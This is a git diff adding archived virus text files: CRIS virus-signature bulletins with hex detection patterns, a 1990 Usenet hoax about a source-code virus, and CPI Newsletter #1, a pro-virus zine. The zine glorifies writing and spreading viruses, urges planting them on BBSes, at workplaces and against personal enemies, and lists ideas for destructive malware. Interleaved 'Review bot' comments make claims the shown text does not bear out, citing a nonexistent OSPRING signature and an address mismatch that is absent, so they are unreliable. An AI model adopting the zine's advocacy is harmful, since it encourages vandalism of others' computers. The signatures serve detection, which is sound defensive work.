+ +Michael Paris [Cris Staff] +- ------------------------------------------------------------------------ + +Virus Name: [CrisSig] Skid-Row + Notes: EXE COM LOW INF + Signature: B4 0D CD 21 B4 52 CD 21 FC 26 C5 77 12 C5 + + + F-Prot 2.11 : No virus found + TBAV 6.12 : May be infected by an unknown virus + SCAN V113 : No Virus found + +If you add the above signature to your scanner, it will be detected. + +First I must say that I truely enjoyed researching this little bugger. It +is a very smart little virus. Upon execution of the infected drop file +nothing out of the ordinary happened. No bait files show alteration, nor +did any other file for that matter. The TRS scanner did not go off, nor +was there a change in memory size or status. A dud, NO WAY! Scanning the +drive again with various scanners (ones on the HD at time of execution) +showed no changes anywhere on the hard drive. So I rebooted and ran TBAV +from a protected diskette and found that all EXE's were indeed infected and +changed. There was no change however in the size or date/time stamp of any +files. EXE's were infected all over the HD, however NO bait files were +infected at all. The virus showed no interest in any COM file including +COMMAND.COM. + + Rebooting again I ran the infected files to observe activity. Qdos was + the file run. At this time the virus displayed the text below. + + This is Skid_Row Virus + Written by Dark Slayer + * in Keelung. Taiwan* + +It did appear to cause the system to hang a few times, I am however not +sure whether the virus caused this, or if it was just the old XT that was +being used to test. + +The virus does go memory resident, even though no TSR's would detect it, +because after termination of infected programs, the message screen will +intermittently appear. Always when a drive is changed. (A: B: C: etc) +At this point I extracted a string to test out. The string was install in +TBAV and the harddrive was planted with more files (clean) and few odd +virii. 
The string identified all the infected file and gave no false +alarms. Next I rebooted and compiled the string into TBAV on the hard drive +and ran the scan again. SHIDROW would not scan. The other virii on the +drive, including some that were user defined, scanned but not Skid-Row. It +seems to be full stealth once it becomes resident. Rescanning from a +write protected disk showed that all the files were indeed still infected.. +The original infected file SKIDROW.COM after execution became memory resident +and no longer showed infection. + +Art Mason [Cris] + +More on Skid Row by: Staale Fagerland + +This virus, both in its a and b version, uses the old beast technique for +hiding itself in memory. One buffer is unlatched from the dos buffer pool +and taken by the virus. + +It is a fast infector, infecting on open as well as on execute. This means +that if you scan with this virus in memory, all eligible files opened by the +scanner will be infected - if your scanner is not able to see it in memory +and stop before it starts opening files. + +The virus infects nothing but exe-files with enough space for it in the +exe header. No file growth, and no infection of com files. But infected +exe-files will after infection have a com structure. + +It is also a stealth virus, disinfectiong on the fly. It seems to use +int13 for both the stealth functions and the infection routine. Int13 +is hooked, but not directly. + +Some quick ways to determine if you have this one in memory: + +1. Look at the dropper with a file browser such as list. If it is + active, you will not be able to see the virus code. + +2. Count the dos buffers. If the virus is up and running, you will + have one less than you thought you had. + +3. If you use a good memory tool, such as MAM, you will see int13 + pointing both at the dos buffer pool _and_ at HMA. Dead giveaway. 
+ + +Regards +StF +- ----------------------------------------------------------------------------- + +Virus Name: [CrisSig Covina + Notes: EXE COM TROJ + Signature: FC 06 1E 0E 8C C8 01 06 35 01 BA 85 00 03 + +F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.12 : Nothing + SCAN V113 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +The Covina Trojan: + +This is a Trojan that adds a line to the end of the autoexec.bat file +to do an unconditional format of the hard disk. When the file run it +will search for the autoexec.bat file on the C: drive and update it with +the command needed. This trojan was written by someone named Super Tanker. + +Michael Paris [Cris] +- ----------------------------------------------------------------------------- + +Virus Name: [CrisSig] Yesturday Once More [YOM] + Notes: EXE COM INF + Signature: 5D 81 ED 0D 01 E8 25 01 B8 53 46 E8 A0 01 + +F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.12 : probably infected by an unknown virus + SCAN V113 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +The YOM virus was written in Finland by Pepper, it is suposed to be his +first non-overwriting virus. This file was written 01-April-94. + +Files will change in size 529 bytes but no time or date changes at all. +According to the programmer this virus has 256 different forms of mutation. +All the texts and some parts of code are mutated. Number #00 of mutations +is the unmutated virus. + +Infects COM-files, within the length of 123-63999 bytes. Doesn't infect +command.com. Uses dotdot-method. Infects 2 files from every directory +from current one to root directory. Checks for previous infection, +Restores date and time stamps, deinits VIRSTOP, Displays a text message +'yesterday once more' every 128th time run and backs up clock by one day. 
+ +Michael Paris [Cris] +- ----------------------------------------------------------------------------- + + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60650-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) +ͼ + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLaw4H6M4CDusTF+9AQGmugIArmWkGZpd06NE5uuaFIkAofTYCsiV6/vD +cLZWSHstrFFVT4+ISlHytJti7H6aHRDEwpfOZIZpmnKxwvSrfmpppg== +=lZLu +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +You can freq a complete CRIS TBAV Update signature file from 1:115/863 +with the magic name CRISTBAV (Works With REGISTERED VERISONS ONLY) + +- ------------------------------------------------------------------------ +C.R.I.S. New Virus Signature Warning (CrisInfo.012) +- ------------------------------------------------------------------------ + +Virus Name: [CrisSig] Rubbit V1.0 + Notes: COM EXE LOW INF + Signature: BE 03 01 8B 0C 51 33 C0 8E C0 26 80 3E FC + +This signature form will work with any signature format for different scanners + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.11 : No Viruses found! + SCAN V112 : No viruses found! + +If you add the above signature to your scanner, it will be detected. + +Rubbit 1.0 is a memory resident COM infector that adds 681 bytes to +infected files. When the virus goes memory resident it will infect +any file that is run. According the the virus code this virus was +written by Peter Ferng. 
+ +Michael Paris (C.R.I.S) +- ------------------------------------------------------------------------ + +Virus Name: [CrisSig] Terminator + Notes: EXE COM LOW INF + Signature: 1E 0E 1F 06 B4 52 CD 21 26 8E 47 FE 26 80 + +This signature form will work with any signature format for different scanners + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.11 : No Viruses found! + SCAN V112 : No viruses found! + +If you add the above signature to your scanner, it will be detected. + +The Terminator virus ia a memory resident EXE infector that will get +past most memory resident protection. After the virus becomes memory +resident it will infect any .EXE file that is run. It will add 904 +bytes to infected files. After a number of infections it will display +a graphic screen saying .... + + Don't be afraid. + I am a very kind virus. + You have do many works today. + So, + I will let your computer slow down. + Have a nice day, + Goodbye. + Press a key to continue. . . + +Michael Paris (C.R.I.S) +- ------------------------------------------------------------------------ + +Virus Name: [CrisSig] Oracle + Notes: EXE COM INF LOW + Signature: 5D 81 ED 22 00 1E 33 C0 8E C0 48 33 FF B9 + + F-Prot 2.11 : New variant of Golgi + TBAV 6.11 : probably infected by an unknown virus. + SCAN V112 : No virus found + +If you add the above signature to your scanner, it will be detected. + +Oracle is a memory resident .COM and .EXE infector. Infected files will +have the size of the file increased by 997 bytes. This size increase will +be hidden if the virus is active in memory. Oracle hooks the 21st interupt +and infects files upon execution. However, On the test system the virus +would infect files, however sometimes had problems executing files. The +following occurences happend while testing. All memory mappers did not work, +any file viewer had eratic behavior, and one larger program received an out +of memory error. 
The virus does create a drive error when attempting to write +to a write protected floppy disk. +The virus contains the following messages: +[Oracle] by Mnemonix + +William Chapman (CRiS) +- ------------------------------------------------------------------------ + +Virus Name: Offspring 0.7 + Notes: COM INF LOW +Signatures: + + TBAV: [CrisSig] Offspring 0.7 + COM INFO LOW + B9 ?1 02 ?1 81 35 *6 47 *5 47 90 *3 E2 F2 C3 + + Scan: "B9?02?8135*(6)47*(5)4790*(3)E2F2C3" [CrisSig] Offspring 0.7 + + + F-Prot 2.11 : Scanned with Heuristics ON. + 21 of the infected 37 scanned as: + "possibly a new variant of Trident" + 16 of the infected 37 scanned as both + "possibly a new variant of Trident" + "seems to be infected with an unknown virus" + + TBAV 6.11 : Scanned with High Heuristics ON + 3 of the 37 scanned as: + "seems to be infected with an unknown virus" + + SCAN V112 : 5 of the 37 scanned as Offspring + 2 of the 37 scanned as Trident + 1 of the 37 scanned as FamN + +If you add the above signature to your scanner, it will be detected. + +Offspring is a memory resident virus. This virus loads into memory and +hooks the 21st interupt. It will infect files when the directory is +changed. It will infect 5 files in the current directory (the directory +the it is leaving). First it will spawn from all .EXE files creating +hidden .COM files which are 1294 bytes in size. After all of the .EXE +files have had .COM files spawned it will then infect .COM files. It +appends itself to the end of the .COM files. The virus is encrypted and +uses an ecncryption routine which throws in NOP's to make the encryption +routine more difficult to use an easier signature on. The virus contains +the follwing messages while in memory. 
The files are encrypted and the +message is not visible: +"Thank you for providing me with a safe place to live Offspring 0.7" +"*.COM" +"*.EXE" + +William Chapman (C.R.I.S) +- ------------------------------------------------------------------------ + + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60650-8077 Voice (708) 863-5472 + BBS (708) 863-5285 crisadm@netcom.com +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates - REGISTERED USERS ONLY) +ͼ + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLZOCzKM4CDusTF+9AQE3OgH/eZ9/j4K9CHhlaUKABMCSoicsQ4RWjg2w +yygU3SvVFNnXsuvKUMwcDqV77UAcyxrtSQH0qVU7LpNz5aNi0JO5+g== +=e3v3 +-----END PGP SIGNATURE----- + \ No newline at end of file diff --git a/textfiles.com/virus/comp.vir b/textfiles.com/virus/comp.vir new file mode 100644 index 00000000..7ecebeb7 --- /dev/null +++ b/textfiles.com/virus/comp.vir 
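Review bot: the OSPRING (089) entry in the hunk above carries `BH 37` inside a scanner signature (`Signature: ?1 09 ?2 C3 E9 E9 ?2 BH 37 ?1 90`), and `BH` is not a hex byte pair like the rest of the string or the `?1`/`?2` wildcards, so this signature cannot be loaded into a scanner as imported; verify the byte against the original posting or mark the entry as unverified rather than shipping it beside the working ones. Two transcription issues in the same hunk: the box-drawing footer has come through as `ͻ`, `ͺ`, `ͼ` (CP437 line characters mis-decoded), which re-transcoding the file from CP437 or storing the original bytes with the encoding noted would fix, and the CRIS mailing address is `60600-8077` in the first footer but `60650-8077` in the later two; the line `Virus Name: [CrisSig Covina` is also missing its closing bracket. The address and bracket should stay as in the source but be noted, since the archive's value is fidelity to the original postings.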
@@ -0,0 +1,166 @@ +From cucard!rockyd!cmcl2!phri!sci.ccny.cuny.edu!rpi!zaphod.mps.ohio-state.edu!swrinde!ucsd!rutgers!netnews.upenn.edu!vax1.cc.lehigh.edu!cert.sei.cmu.edu!krvw Fri Apr 20 16:55:42 1990 +Path: dasys1!cucard!rockyd!cmcl2!phri!sci.ccny.cuny.edu!rpi!zaphod.mps.ohio-state.edu!swrinde!ucsd!rutgers!netnews.upenn.edu!vax1.cc.lehigh.edu!cert.sei.cmu.edu!krvw +From: peter@ficc.uu.net (Peter da Silva) +Newsgroups: comp.virus +Subject: Usenet "virus" {Ed. HOAX - no, that's *not* a UNIX variant...} +Message-ID: <0009.9004231214.AA04329@ubu.cert.sei.cmu.edu> +Date: 20 Apr 90 20:55:42 GMT +Sender: Virus Discussion List +Lines: 152 +Approved: krvw@sei.cmu.edu + +> I have to believe that the same yahoos who think viruses are fun +> things on single-user OS machines like PCs and Macs would love to +> infect Unix and VMS systems, if they could. + +They can. + +> I really do believe that these systems are more difficult to +> circumvent, and this has, to some extent, accounted for great disparity +> in the number of successful attacks on these systems as compared to the +> single-user boxes. + +I believe you're right, *but* source code has little to do with it. + +It's been at least 6 months since I posted this little fable. + + The Usenet virus: a case history. + A cautionary tale. + + The Usenet virus was detected when a user discovered that + a program he had received from the net seemed to have two + versions of malloc included with the source. One version of + malloc might be odd, but people have never tired of reinventing + the wheel. Two versions were suspicious, particularly since they + lead to a name conflict when the program was linked. + + The first, lmalloc.c, seemed to be identical to the + malloc listed in Kernighan and Ritchie. The second, bmalloc.c, + was rather strange, so we concentrated our efforts on it... this + time was later found to have been wasted. 
+ + After a little work during spare moments over the course + of a week we decided it was actually a clumsy version of the + buddy system (a fast but space-inefficient method of memory + allocation). It might make a good example of how not to write + readable code in some textbook, but it wasn't anything to get + worried about. + + Back to the first. It made use of a routine named + speedhack() that was called before sbrk() the first time the + malloc() was called. There was a file speedhack.c, but it didn't + contain any code at all, just a comment saying that it would be + implemented in a future version. After some further digging, + speedhack was found at the end of main.c. The name was disguised + by some clever #defines, so it never showed up in tags and + couldn't be found just by grepping the source. + + This program turned out to be a slow virus. When it was + run, it looked for a file 'lmalloc.c'. If it found it, or it + didn't find Makefile, it returned. From then on malloc ran + normally. + + If it didn't find it, it reconstructed it using a series + of other routines with innocuous names tagged on to the end of + other files. This was apparently an attempt to avoid overly + increasing the size of any one of the files in the directory. + + Then it went into Makefile or makefile (it looked for + both) and added lmalloc.o onto the end of the first list of '.o' + files it found. It then reconstructed each of the extra routines, + and speedhack itself, using techniques familiar to any reader of + the obfuscated 'C' contest. These were tagged onto the ends of + the '.c' files that corresponded to the '.o' files in this same + list. The program was now primed to reconstruct the virus. 
+ + On inspection, we discovered that about 40% of the + sources on our system were infected by the speedhack virus, We + also found it in one set of shell archives that we'd received + but never unpacked or used, which we took as evidence that it had + spread to a number of other systems. + + We have no idea how our system was infected. Given the + frequency with which we make modifications and updates, it's + likely that the original speedhacked code is no longer on the + system. We urge you to inspect your programs for this virus in + an attempt to track it to its source. It almost slipped by + us... if the author had actually put a dummy speedhack in + speedhack.c we would have merely taken lmalloc.o out of the + Makefile and defused *this* copy of the virus without being any + the wiser. + + There are other failings in this program that we have + thought of. We have decided not to describe them to avoid giving + the author of this program ideas we might regret. Some ways that + programs like this can be defeated include 'crc' checks of source + files and, of course, careful examination of sources received + from insecure sites. + +- ----- + +Now I have to make a confession. This whole document is a hoax intended +to dramatize the problems involved with viruses and Usenet. I suspect that +most of you were clued to this by the Keywords line. While playing with the +idea and writing this article several things occurred to me: + +First of all, this virus is a much more complex program than any of the +viruses that have been spotted on personal computers. I think it has to be, +based on the design goals that a REAL UNIX virus must satisfy. I have not +attempted to actually implement it because of this. + + It must be small, to avoid detection. It must not cause files to +grow without bound. + + It must infect foreign files, otherwise it's not a virus... just a +Trojan Horse (like the bogus ARC and FLAG programs on the PC). Trojan horses +are a dime-a-dozen. 
+ + It must infect source files, since this is the primary software +distribution channel for UNIX. A virus stuck on one machine is a boring +one. + + It must not break the infected program (other than what it might +care to do deliberately). + + It must not be obvious from a simple examination of the source (like, +changing main to Main and having a virus-main call Main). + +I believe that given these goals (which are, of course, subject to +debate) a simpler program would be successful in infesting more than a +small fraction of the machines that (say) comp.sources.misc reaches. + +There are systems immune to this particular attack, of course. Ones not +running UNIX, so sbrk() doesn't work. Or ones with radically different +versions of malloc(). Ones with no 'c' compiler. They are in the minority, +though. + +On the other hand a virus of this type could infest a large proportion +of the net before it was found. The virus I described does not cause any +direct damage, except for using up a relatively small amount of disk +space. A more vicious virus is possible. + +Other variations of this virus are obviously possible. For example, it +could be tagged onto any standard 'C' library routine... I chose malloc +merely because source was available and because it's something that people +complain about, so they wouldn't be likely to find an extra copy suspicious. +Another good routine would be perror(), for the same reason. This would have +the additional benefit of making the spread of the infection dependent on +an additional random factor, making it harder to detect the virus. + +Do I think something like this is likely? No. Especially not now that +I've written this little piece of science fiction. I'm sure that +eventually someone will try something unlike this, I suspect that their +virus would get caught much sooner than 'speedhack', because I think +that more people look at the source than conventional wisdom would lead +you to believe. 
But, again, this is just my personal opinion. Debate is +welcomed... that's why I did this in the first place: to inject some +sense into the debate currently raging in comp.sys.amiga. + +- -- + _--_|\ `-_-' Peter da Silva. +1 713 274 5180. +/ \ 'U` Have you hugged your wolf today? +\_.--._/ + v Disclaimer: People have opinions, organisations have policy. + + + \ No newline at end of file diff --git a/textfiles.com/virus/cpi-1.txt b/textfiles.com/virus/cpi-1.txt new file mode 100644 index 00000000..ba1f47cc --- /dev/null +++ b/textfiles.com/virus/cpi-1.txt 
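Review bot: the message imported in this hunk is missing a header its own body depends on: the text says readers were "clued to this by the Keywords line", but no `Keywords:` header survives above (only Path, From, Newsgroups, Subject, Message-ID, Date, Sender, Lines, Approved), so either restore the original header block or record that it was trimmed. The separator lines are also dash-escaped (`- -----` and `- -- `), which is PGP clearsign escaping, yet no `BEGIN PGP SIGNED MESSAGE` envelope is present in this file; if it was extracted from a signed digest, undo the escaping or keep the envelope so readers do not mistake `- --` for part of the signature block. Minor: the file ends with two blank `+` lines followed by `\ No newline at end of file`; trim the trailing blank lines and add the final newline.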
@@ -0,0 +1,368 @@ + Computer Viruses - A Protagonist's Point Of View + -----===] CORRUPTED PROGRAMMING INTERNATIONAL [===----- + + == CPI Newsletter #1 == + [ Article Written By Doctor Dissector ] + Released : June 30, 1989 + + Call The CPI Headquarters + 619-566-7093 + 1200/2400 Baud :: Open 24 Hours + + + + [1.1] Introduction: + ------------------- + + Welcome to "Computer Viruses - A Protagonist's Point Of View." This + letter, perhaps the beginning of a small newsletter. Well, this "letter," + is written by one person right now, maybe I'll get some people to send in + more info, ideas, and examples to CPI. If you would like to contribute, + please upload text files to CPI Headquarters (see heading for number) and + leave a note to me telling me you are contributing to our magazine. + + Well, as an overview, this article will cover a few topics dealing + with viruses; however, there will be no examples covered as we are short of + programmers at the moment. That reminds me, if you would like to become a + member of CPI, fill out the accompanying text file and upload it to CPI HQ + as an upload to the Sysop, then leave me and the Sysop some mail to tell us + you registered to become a member. We will get back to you as soon as + possible. + + The purpose of this magazine is to expand and broaden the general + computer user's view and knowledge of the dreadful computer Virus, as well + as a bit on Trojans (not the hardware, the SOFTWARE!). Then, after the + knowledge of these computer crackers is better understood, the second + purpose of this newsletter is to teach both methods of developing and + executing a better virus/trojan. We, CPI, feel viruses and trojans are a + vital part of the computer world, and should stand along the trades of + hacking, phreaking, cracking, pirating, and pyro as an equal, not something + to be looked down upon (unless you are hit by one...). 
+ + In the future, we hope CPI will grow and spread, just like a virus, + and encompass a large domain of the crackers, hackers, and other elite out + there so that the life of this group will be maintained, and that this + newsletter, hopefully, won't be the only issue to be released during the + group's existence. + + Also, please note that this newsletter is purely for the spread of new + ideas and to educate the reader of this "new" software technonlogy, and the + document, and the author of the document do not encourage or support any + illegal use of the information contained, and the reader is solely + responsible for their actions after aquiring this document. + + Doctor Dissector + CPI/ANE/TPH Author/Editor + Phortune 500 + + --[ Table Of Contents ]---------------------------------------------------- + + Phile Subject Author + ----- --------------------------------------------------------- + 1.1 Introduction & Table Of Contents.........Doctor Dissector + 1.2 Viruses- What, Where, Why, How...........Doctor Dissector + 1.3 Aspects Of Some Known Viruses............Doctor Dissector + 1.4 Ideas For Future Viruses.................Doctor Dissector + 1.5 Suggested Reading........................Doctor Dissector + 1.6 Conclusion...............................Doctor Dissector + 1.x CPI Application..........................Doctor Dissector + +Subject: CPI Issue 1 2/6 + + + ---------------------------------------------------------------------- + + [1.2] Viruses- What, Where, Why, How + + + If you are a beginner in this field, you may be curious to what + a virus/trojan is. Perhaps you heard about it through some BBS, or + known someone who had their system crashed by one. Well, this is for + you. + + In the Trojan War, way back when, there existed the Trojan + Horse, right? Well, nowadays, there is a modern version of the Trojan + Horse existing is software. 
The modern, computer, Trojan horse is + really simple, a psychedelic hacker implants destructive code into a + normal (or fake) file. This modified/fake file, when executed will + destroy or remove something from the host computer, usually format + the hard drive, delete all files, or something similar. In order to + distribute the corrupt phile, the hacker goes and does one or more of + various things; depending on how deranged this individual is (hehe). + These things are covered in the following section. + + A virus, in normal terms is an organism which spreads malign + from one host to another, transmitting itself through biological + lines so that both the previous host and the future host become + infected with the virus. Today, there are computer viruses, and just + like biological viruses, they spread from file to file, host to host, + infecting everything it "sees." These computer viruses can either + destroy the code it infects immediately, or over a period of time, + corrupt or damage the host system it thrives upon. For example, a + virus hidden in a file on a BBS could be downloaded to a host system. + Then, the user who downloaded it executes the file, which executes + normally (as seen by the operator), but at the same time, the virus + attacks other files, and infects them, so that each file owned by the + user becomes infected with the virus. Then, at a given time or when + something is fulfilled by the host system, the virus becomes a trojan + and destroys, encrypts, or damages everything available, infected or + un-infected. In general, a virus is a timed trojan that duplicates + itself to other files, which, in effect sustains the virus's life- + span in the computer world, as more host systems are infiltrated by + the disease. + + Now that I've given you a description of the computer virus and + trojan, we can go onto more complex things... well, not really... + + Ok, now, let's trace the life of a virus. 
A virus/trojan is born + in the mind of some hacker/programmer that decides to develop + something out of the ordinary, not all viruses/trojans are + destructive, often, some are amusing! Anyway, the hacker programs the + code in his/her favorite language; viruses can be developed with + virtually any language, BASIC, Pascal, C, Assembly, Machine Code, + Batch files, and many more. Then, when the disease is complete and + tested, the hacker intentionally infects or implants the code into a + host file, a file that would be executed by another un-suspecting + user, somewhere out there. Then, the hacker does one or more of many + things to distribute his baby. The hacker can upload the infected + file to a local BBS (or many local/LD BBS's), give the infected file + to a computer enemy, upload the infected file to his/her workplace + (if desired...hehe), or execute the phile on spot, on the host + system. Then, the virus, gets downloaded or executed, it infiltrates + the host system, and either infects other files, or trashes the + system instantly. Eventually, the infected system's user gets smart + and either trashes his system manually and starts fresh, or some mega- + technical user attempts to recover and remove the virus from all of + the infected files (a horrendous job). Then, the virus dies, or other + host systems that were previously infected continue, and accidentally + upload or hand out infected files, spreading the disease. Isn't that + neat? + + Now, to answer your questions; I already explained what a + virus/trojan is and how they are developed/destroyed. Now, where do + these suckers come from? Why, some hacker's computer room, of course! + All viruses and trojans begin at some computer where some maniacal + hacker programs the code and implants it somewhere. Then, you ask, + why do they do this? Why hack? Why phreak? Why make stupid pyro piles + of shit? Think about it... This is an ART! Just like the rest. 
While + Hacking delivers theft of services, Phreaking delivers theft of + services, Cracking/Pirating delivers theft of software and copyright + law breaks, Pyro delivers unlawful arson/explosives, Viruses and + Trojans vandalize (yes, legally it is vandalism and destruction of + property) computer systems and files. Also, these are great to get + back at arch-computer enemies (for you computer nerds out there), and + just wreak havoc among your computer community. Yeah, PHUN at it's + best... + + ---------------------------------------------------------------------- +Subject: CPI Issue 1 3/6 + + + ---------------------------------------------------------------------- + + [1.3] Aspects Of Some Known Viruses + + + Many viruses have been written before and probably after you + read this article. A few names include the Israeli, Lehigh, Pakistani + Brain, Alameda, dBase, and Screen. Keep in mind that most viruses + ONLY infect COM and EXE files, and use the Operating System to spread + their disease. Also, many viruses execute their own code before the + host file begins execution, so after the virus completes passive + execution (without "going off") the program will load and execute + normally. + + Israeli - This one is a TSR virus that, once executed, stayed in + memory and infected both COM and EXE files, affecting both HARD and + FLOPPY disks. Once executed, the virus finds a place to stay in the + system's memory and upon each execution of a COM or EXE file, copies + itself onto the host phile. This one is very clever, before infecting + the file, it preserves the attributes and date/time stamp on the + file, modifies the files attributes (removes READ only status so it + can write on it), and then restores all previous values to the file. + This virus takes very little space, and increases the host file size + by approximately 1800 bytes. The trigger of this virus is the date + Friday the 13th. 
This trigger will cause the virus to either trash + the disk/s or delete the files as you execute them, depending on the + version. Whoever wrote this sure did a nice job.... + + Lehigh - This one infects the COMMAND.COM file, which is always + run before bootup, so the system is ready for attack at EVERY bootup. + It hides itself via TSR type and when any disk access is made, the + TSR checks the COMMAND.COM to see if it is infected. Then if it + isn't, it infects it, and adds a point to its counter. When the + counter reaches 4, the virus causes the disk to crash. This one, + however, can be stopped by making your COMMAND.COM Read-Only, and the + date/time stamp is not preserved, so if the date/time stamp is + recent, one could be infected with this virus. This virus is + transferred via infected floppy disks as well as a clean disk in an + infected system. It can not infect other hosts via modem, unless the + COMMAND.COM is the file being transferred. + + Pakistani Brain - This one infects the boot sector of a floppy + disk. When booting off of the disk, the virus becomes a TSR program, + and then marks an unused portion of the disk as "bad sectors." The + bad sectors, cannot be accessed by DOS. However, a disk directory of + an infected disk will show the volume label to be @ BRAIN. A CHKDSK + will find a few bad sectors. When you do a directory of a clean disk + on an infected system, the disk will become infected. The virus has + no trigger and immediately begins to mark sectors bad even though + they are good. Eventually, you will have nothing left except a bunch + of bad sectors and no disk space. The virus itself has the ASCII + written into it with the words "Welcome the the Dungeon" as well the + names of the supposed authors of the virus, and address, telephone + number, and a few other lame messages. To inoculate your system + against this virus, just type 1234 at byte offset location 4 on the + boot track (floppy disks). 
+ + Alameda - This virus also infects the boot sector of the host + system. It is very small and inhabits ONE sector. This one only + damages floppy disks. If you boot from a diseased disk, the virus + loads itself into HIGH memory and during a warm boot, it remains in + memory and infects any other clean disks being booted from on the + infected system. It then replaces the boot track with the virus track + and replaces the boot track on the last track of the disk, so any + data located on the last track is corrupted. All floppy disks + inserted during reboot can catch this virus. This virus only infects + IBM PC's and XT's, however, it does not infect 286's or 386's. + + dBase - This one is a TSR virus that works in a manner similar + to the Israeli virus. It looks for files with a DBF extension, then + it replicates itself in all DBF files, preserving file size, and all + attributes. After the first 90 days, the virus destroys your file + allocation table and corrupts all data in the DBF files. This virus + creates a hidden file, BUG.DAT that indicates the bytes transposed + (in order to preserve file specifications). Run a CHKDSK to make sure + you don't have any extra hidden files or a BUG.DAT in your dBase + directory. If you create a BUG.DAT file manually in your directory, + making it read-only, you will be safe from this virus. + + Screen - This one is another TSR virus that comes on and off + periodically. When it is on, it examines the screen memory and looks + for any 4 digits starting at a random place on the screen. Then it + transposes two of them, this is not a good thing. It infects every + COM file in your directory, HARD and FLOPPY disks can be infected. + You can use a ASCII searcher to check if you are infected by + searching for "InFeCt" in your COM files. If you have this written, + read the 4 bytes immediately preceding it and overwrite the first 4 + bytes of the program with their value. Then, truncate the program at + their stored address. 
You will rid yourself of this virus. Make sure + you use a clean copy of you editor for this. + + Other viruses include MAC, AMIGA, and many other environments. + By the way, other computer systems other than IBM/DOS may become part + of CPI if you qualify. + + Anyway, these are a few viruses I have read on and thus passed + the information to you, I hope you can learn from them and get some + ideas for some. + +Subject: CPI Issue 1 4/6 + + + ---------------------------------------------------------------------- + + [1.4] Ideas For Future Viruses + + + Since I have covered viruses already in existence, lets talk + about viruses that can or may exist in the near future. These are not + even close to half the ideas possible for destruction with + trojans/viruses available, but will pose as a challenge to you who + are short of ideas. + + CSR Virus - A CMOS Stay Resident VIRUS that will implant itself + in the CMOS memory of the AT (286/386/486?) which will execute upon + every bootup. This one would be VERY nice. + + Failsafe Virus - Preserves ALL attributes, Preserves file size, + remains TSR but hidden to TSR location programs, Modifies attributes + to get around Read-Only files, Infects ALL files (Not only COM and + EXE), encrypts all data on trigger (irreversible) but preserves + original file size/attributes. + + Format Virus - A virus which is TSR and when a DOS format or any + other FORMAT type of call is called, will FORMAT every other track, + but will not allow DOS to notice. + + Write Virus - A virus that intercepts write to disk, which + deletes the disk write, and marks sector as bad at write point. + + ASCII Virus - Virus that would scramble ASCII text in any file + at trigger. + + Low Level Format Virus - Virus that low level formats (BAD + format) HD in background with data still intact. I have seen regular + background LLF programs, and it keeps data in place, but it does it + correctly... hmmm...? + + Hide Virus - A Virus that hides files slowly. 
+ + Crash Virus - Virus that emulates typical system crashes/freezes + occasionally. Causes BIOS to freeze and write BIOS ERROR messages on + screen. + + Modem Virus - One that remains in boot sector and TSR and + monitors data from serial ports, puts in "artificial" line-noise. + NICE! + + These are just a few I thought up... these could be really + good... Think of some more and call CPI HQ TODAY! + +Subject: CPI Issue 1 5/6 + + + ---------------------------------------------------------------------- + + [1.5] Suggested Reading + + + The following list is a compiled listing of some material I have + read as well as other sources you MIGHT find information on + concerning viruses and trojan horses. Happy trashing.... + + + "Know Thy Viral Enemy" by Ross M. Greenberg + BYTE Magazine + June 1989, pg 275-280 + + "Viruses: Assembly, Pascal, BASIC & Batch" by Tesla Coil ][ + Phreakers And Hackers Underground Network Newsletter (PHUN) + Issue #3, Volume 2, Phile #2 + + "A Boot Sector Virus" by Southern Cross + Phreakers And Hackers Underground Network Newsletter (PHUN) + Issue #4, Volume 2, Phile #3 + + "Computer Viruses: A High Tech Disease" by Abacus + 2600 Magazine + Volume 5, Number 2 + +Subject: CPI Issue 1 6/6 + + + ---------------------------------------------------------------------- + + [1.6] Conclusion + + + Thus ends the first issue of CPI's "Computer Viruses: A + Protagonist's Point Of View." We hope you enjoyed it and we hope it + was informative and complete (at least about the specific issues). + + We, CPI, hope that you will share your information and comments + with us at CPI Headquarters, as this newsletter will require both + information and an expansion of our current member base. If you feel + you have what it takes to gather, read, or program for CPI, send us + an application today. + + Oh yeah, if this happens to be the only issue of CPI, oh well, + and many thanx to those who read it at least once, and enjoyed it (or + laughed at it). 
Until our (my?) next issue, have phun and don't get + toooo wild...... + + + + + =====[ CPI Headquarters * 619-566-7093 * 1200/2400bps * 24Hrs ]===== + diff --git a/textfiles.com/virus/cpi-2.txt b/textfiles.com/virus/cpi-2.txt new file mode 100644 index 00000000..e16ec1b8 --- /dev/null +++ b/textfiles.com/virus/cpi-2.txt 
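Review bot: the cpi-1.txt hunk commits a mail-digest capture rather than the zine as released: the `Subject: CPI Issue 1 3/6` through `6/6` headers and the `----------` separators that precede each `[1.n]` section are BITNET digest framing, not part of the original text, and nothing in the commit says so. Record the provenance (the textfiles.com path and that the file is a digest capture) in the commit message or an index entry so later readers do not treat the Subject lines as section headings the author wrote.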
